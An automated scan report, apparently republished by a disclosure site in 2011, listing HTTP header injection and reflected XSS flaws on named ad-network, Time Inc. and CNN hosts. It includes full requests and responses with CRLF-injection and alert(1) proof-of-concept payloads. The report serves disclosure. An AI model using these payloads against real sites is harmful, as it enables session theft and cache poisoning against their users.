XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10052011-01

Report generated by XSS.CX at Wed Oct 05 10:00:13 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. HTTP header injection

1.1. http://amch.questionmarket.com/adsc/d929507/5/43897477/decide.php [ES cookie]

1.2. http://amch.questionmarket.com/adsc/d929507/5/43971891/decide.php [ES cookie]

1.3. http://amch.questionmarket.com/adscgen/st.php [code parameter]

1.4. http://amch.questionmarket.com/adscgen/st.php [site parameter]

1.5. http://cgi.timeinc.net/cgi-bin/mail/dnp/privacy_centralized.cgi/time [REST URL parameter 1]

1.6. http://cgi.timeinc.net/cgi-bin/mail/dnp/privacy_centralized.cgi/time [REST URL parameter 4]

1.7. http://cgi.timeinc.net/cgi-bin/mail/dnp/privacy_centralized.cgi/time [REST URL parameter 5]

2. Cross-site scripting (reflected)

2.1. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

2.2. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

2.3. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

2.4. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

2.5. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

2.6. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

2.7. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

2.8. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

2.9. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

2.10. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

2.11. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.12. http://api-public.addthis.com/url/shares.json [callback parameter]

2.13. http://api.bit.ly/v3/shorten [callback parameter]

2.14. http://api.bit.ly/v3/shorten [longUrl parameter]

2.15. http://ar.voicefive.com/b/rc.pli [func parameter]

2.16. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.17. http://bid.openx.net/json [c parameter]

2.18. http://d.tradex.openx.com/afr.php [cb parameter]

2.19. http://d.tradex.openx.com/afr.php [loc parameter]

2.20. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

2.21. http://d.tradex.openx.com/afr.php [zoneid parameter]

2.22. http://digg.com/tools/diggthis.js [REST URL parameter 1]

2.23. http://digg.com/tools/diggthis.js [REST URL parameter 2]

2.24. http://img.mediaplex.com/content/0/11791/129988/lm_f35_Congress_300x600.js [mpck parameter]

2.25. http://img.mediaplex.com/content/0/11791/129988/lm_f35_Congress_300x600.js [mpck parameter]

2.26. http://img.mediaplex.com/content/0/11791/129988/lm_f35_Congress_300x600.js [mpvc parameter]

2.27. http://img.mediaplex.com/content/0/11791/129988/lm_f35_Congress_300x600.js [mpvc parameter]

2.28. http://js.revsci.net/gateway/gw.js [csid parameter]

2.29. http://lingows.appspot.com/bubble/ [request_id parameter]

2.30. http://lingows.appspot.com/bubble/ [respond_path parameter]

2.31. http://moneyland.time.com/ [name of an arbitrarily supplied request parameter]

2.32. http://pglb.buzzfed.com/26813/3c003b8f05f4a40792d0446420f9ef23 [callback parameter]

2.33. http://pglb.buzzfed.com/26813/570b5c03d148b327600c7b21c4de1c70 [callback parameter]

2.34. http://pglb.buzzfed.com/26813/62f6407fe047d99a744b85355711cfdc [callback parameter]

2.35. http://pglb.buzzfed.com/26813/663fb9f3b96e903356d0d2dedf5d432c [callback parameter]

2.36. http://search.time.com/results.html [name of an arbitrarily supplied request parameter]

2.37. http://search.time.com/results.html [name of an arbitrarily supplied request parameter]

2.38. http://searchapp.cnn.com/cnn-search/query.jsp [query parameter]

2.39. http://searchapp.cnn.com/cnn-search/query.jsp [sortBy parameter]

2.40. http://searchapp.cnn.com/gwebsearch/gwebsearch.jsp [domains parameter]

2.41. http://searchapp.cnn.com/gwebsearch/gwebsearch.jsp [text parameter]

2.42. http://secure-us.imrworldwide.com/cgi-bin/m [REST URL parameter 2]

2.43. http://secure-us.imrworldwide.com/cgi-bin/m [at parameter]

2.44. http://secure-us.imrworldwide.com/cgi-bin/m [ci parameter]

2.45. http://secure-us.imrworldwide.com/cgi-bin/m [cr parameter]

2.46. http://secure-us.imrworldwide.com/cgi-bin/m [ep parameter]

2.47. http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]

2.48. http://secure-us.imrworldwide.com/cgi-bin/m [pr parameter]

2.49. http://secure-us.imrworldwide.com/cgi-bin/m [r parameter]

2.50. http://secure-us.imrworldwide.com/cgi-bin/m [rt parameter]

2.51. http://secure-us.imrworldwide.com/cgi-bin/m [st parameter]

2.52. https://secure.customersvc.com/wes/servlet/Show [MSRSMAG parameter]

2.53. https://secure.customersvc.com/wes/servlet/Show [MSRSMAG parameter]

2.54. http://weather-rest.washingtonpost.com/rest/conditions/20001j [jsonp parameter]

2.55. http://widgets.digg.com/buttons/count [url parameter]

2.56. http://wpni.tt.omtrdc.net/m2/wpni/mbox/standard [mbox parameter]

2.57. http://www.life.com/standalone/ad-frame.php [pos parameter]

2.58. http://www.life.com/standalone/ad-frame.php [size parameter]

2.59. http://www.life.com/standalone/ad-frame.php [size parameter]

2.60. http://www.life.com/standalone/ad-frame.php [tileCounter parameter]

2.61. http://www.linkedin.com/countserv/count/share [url parameter]

2.62. http://www.seahorse.co.uk/shop/products/back_issues.php [name of an arbitrarily supplied request parameter]

2.63. http://www.seahorse.co.uk/shop/products/back_issues.php [year parameter]

2.64. http://www.seahorse.co.uk/shop/products/show_cart.php [new parameter]

2.65. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

2.66. http://ar.voicefive.com/bmx3/broker.pli [UIDR cookie]

2.67. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]

2.68. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]

2.69. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]

2.70. http://ar.voicefive.com/bmx3/broker.pli [ar_p117672109 cookie]

2.71. http://ar.voicefive.com/bmx3/broker.pli [ar_p119936314 cookie]

2.72. http://ar.voicefive.com/bmx3/broker.pli [ar_p120927104 cookie]

2.73. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]

2.74. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

2.75. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

2.76. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

2.77. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]

2.78. https://secure.customersvc.com/servlet/Show [MSRSMAG parameter]



1. HTTP header injection  next
There are 7 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://amch.questionmarket.com/adsc/d929507/5/43897477/decide.php [ES cookie]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d929507/5/43897477/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 10bc5%0d%0ac7388fd636e was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d929507/5/43897477/decide.php?ord=1317824526 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest+faq+contact&x=0&y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1317739962; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_930660-43-2_931732-23-1_44028673-8-2_200238374159-9-1_43920385-5-1_44116962-12-1_927730-4-1_44103179-20-1_600001500465-35-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_873769-]|@~M-0_913744-l!~~M-0_924375-}r~~M-RB_928397-C$~~M-OJ_928202-<8A0N-0_927865-bJA0N-0_931859-K3C0N-0_927407-PBC0N-0_928398-C|@~M-=hL_887846-6K'|M-9LX210bc5%0d%0ac7388fd636e

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:22:29 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Tue, 05-Oct-2010 14:22:28 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_930660-43-2_931732-23-1_44028673-8-2_200238374159-9-1_43920385-5-1_44116962-12-1_927730-4-1_44103179-20-1_600001500465-35-1%5D%5D%3E%3E_43897477-5-5; expires=Sun, 25-Nov-2012 06:22:29 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_873769-]|@~M-0_913744-l!~~M-0_924375-}r~~M-RB_928397-C$~~M-OJ_928202-<8A0N-0_927865-bJA0N-0_931859-K3C0N-0_927407-PBC0N-0_928398-C|@~M-=hL_887846-6K'|M-9LX210bc5
c7388fd636e
_929507-rCL0N-0; expires=Sun, 25-Nov-2012 06:22:29 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

1.2. http://amch.questionmarket.com/adsc/d929507/5/43971891/decide.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d929507/5/43971891/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 60b44%0d%0a1dbf3b28d86 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d929507/5/43971891/decide.php?ord=1317825528 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.time.com/time/magazine
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1317739962; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_930660-43-2_931732-23-1_44028673-8-2_200238374159-9-1_43920385-5-1_44116962-12-1_927730-4-1_44103179-20-1_600001500465-35-1_43897477-5-1; ES=60b44%0d%0a1dbf3b28d86

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:39:28 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Tue, 05-Oct-2010 14:39:27 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_930660-43-2_931732-23-1_44028673-8-2_200238374159-9-1_43920385-5-1_44116962-12-1_927730-4-1_44103179-20-1_600001500465-35-1_43897477-5-1%5D%5D%3E%3E_43971891-5-2; expires=Sun, 25-Nov-2012 06:39:28 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=60b44
1dbf3b28d86
_929507-SOL0N-0; expires=Sun, 25-Nov-2012 06:39:28 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

1.3. http://amch.questionmarket.com/adscgen/st.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 25157%0d%0a7c98215d65e was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=929507&site=70585250&code=4389747725157%0d%0a7c98215d65e&randnum=7914645 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest+faq+contact&x=0&y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1317739962; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_930660-43-2_931732-23-1_44028673-8-2_200238374159-9-1_43920385-5-1_44116962-12-1_927730-4-1_44103179-20-1_600001500465-35-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_873769-]|@~M-0_913744-l!~~M-0_924375-}r~~M-RB_928397-C$~~M-OJ_928202-<8A0N-0_927865-bJA0N-0_931859-K3C0N-0_927407-PBC0N-0_928398-C|@~M-=hL_887846-6K'|M-9LX2

Response

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 14:22:17 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Tue, 05-Oct-2010 14:22:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_930660-43-2_931732-23-1_44028673-8-2_200238374159-9-1_43920385-5-1_44116962-12-1_927730-4-1_44103179-20-1_600001500465-35-15a06482d12ea091bd0edfa0a_43897477-5-11_929507-1-13; expires=Sun, 25-Nov-2012 06:22:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_873769-]|@~M-0_913744-l!~~M-0_924375-}r~~M-RB_928397-C$~~M-OJ_928202-<8A0N-0_927865-bJA0N-0_931859-K3C0N-0_927407-PBC0N-0_928398-C|@~M-=hL_887846-6K'|M-9LX25a06482d81dfb701a212fb4b_929507-D{K0N-SG; expires=Sun, 25-Nov-2012 06:22:17 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=929507&site=5-70585250-&code=4389747725157
7c98215d65e

Content-Length: 0
Content-Type: text/html


1.4. http://amch.questionmarket.com/adscgen/st.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 616b0%0d%0acd664a2ced8 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=929507&site=70585250616b0%0d%0acd664a2ced8&code=43897477&randnum=7914645 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest+faq+contact&x=0&y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1317739962; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_930660-43-2_931732-23-1_44028673-8-2_200238374159-9-1_43920385-5-1_44116962-12-1_927730-4-1_44103179-20-1_600001500465-35-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_873769-]|@~M-0_913744-l!~~M-0_924375-}r~~M-RB_928397-C$~~M-OJ_928202-<8A0N-0_927865-bJA0N-0_931859-K3C0N-0_927407-PBC0N-0_928398-C|@~M-=hL_887846-6K'|M-9LX2

Response

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 14:22:07 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Tue, 05-Oct-2010 14:22:06 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_930660-43-2_931732-23-1_44028673-8-2_200238374159-9-1_43920385-5-1_44116962-12-1_927730-4-1_44103179-20-1_600001500465-35-15a06482d12ea091bd0edfa0a_43897477-5-11_929507-1-4; expires=Sun, 25-Nov-2012 06:22:07 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_873769-]|@~M-0_913744-l!~~M-0_924375-}r~~M-RB_928397-C$~~M-OJ_928202-<8A0N-0_927865-bJA0N-0_931859-K3C0N-0_927407-PBC0N-0_928398-C|@~M-=hL_887846-6K'|M-9LX25a06482d81dfb701a212fb4b_929507-D{K0N-IG; expires=Sun, 25-Nov-2012 06:22:07 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=929507&site=-1-70585250616b0
cd664a2ced8
-&code=43897477
Content-Length: 0
Content-Type: text/html


1.5. http://cgi.timeinc.net/cgi-bin/mail/dnp/privacy_centralized.cgi/time [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgi.timeinc.net
Path:   /cgi-bin/mail/dnp/privacy_centralized.cgi/time

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c5071%0d%0adb9e40e93e6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c5071%0d%0adb9e40e93e6/mail/dnp/privacy_centralized.cgi/time?dnp_source=E HTTP/1.1
Host: cgi.timeinc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest&x=0&y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 05 Oct 2011 14:53:14 GMT
Server: Apache
Location: http://www.pathfinder.com/c5071
db9e40e93e6
/mail/dnp/privacy_centralized.cgi/time?dnp_source=E
Content-Length: 303
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.pathfinder.c
...[SNIP]...

1.6. http://cgi.timeinc.net/cgi-bin/mail/dnp/privacy_centralized.cgi/time [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgi.timeinc.net
Path:   /cgi-bin/mail/dnp/privacy_centralized.cgi/time

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5d495%0d%0a11171e271ae was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /cgi-bin/mail/dnp/5d495%0d%0a11171e271ae/time?dnp_source=E HTTP/1.1
Host: cgi.timeinc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest&x=0&y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 05 Oct 2011 14:53:15 GMT
Server: Apache
Location: http://subscription.timeinc.com/storefront/subs2-privacy/privacy-redirect/5d495
11171e271ae
/time?dnp_source=E
Content-Length: 318
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://subscription.tim
...[SNIP]...

1.7. http://cgi.timeinc.net/cgi-bin/mail/dnp/privacy_centralized.cgi/time [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgi.timeinc.net
Path:   /cgi-bin/mail/dnp/privacy_centralized.cgi/time

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload adc03%0d%0a65009c68769 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /cgi-bin/mail/dnp/privacy_centralized.cgi/adc03%0d%0a65009c68769?dnp_source=E HTTP/1.1
Host: cgi.timeinc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest&x=0&y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 05 Oct 2011 14:53:15 GMT
Server: Apache
Location: http://subscription.timeinc.com/storefront/subs2-privacy/privacy-redirect/privacy_centralized.cgi/adc03
65009c68769
?dnp_source=E
Content-Length: 337
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://subscription.tim
...[SNIP]...

2. Cross-site scripting (reflected)  previous
There are 78 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload fdb05<script>alert(1)</script>c67450030ae was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

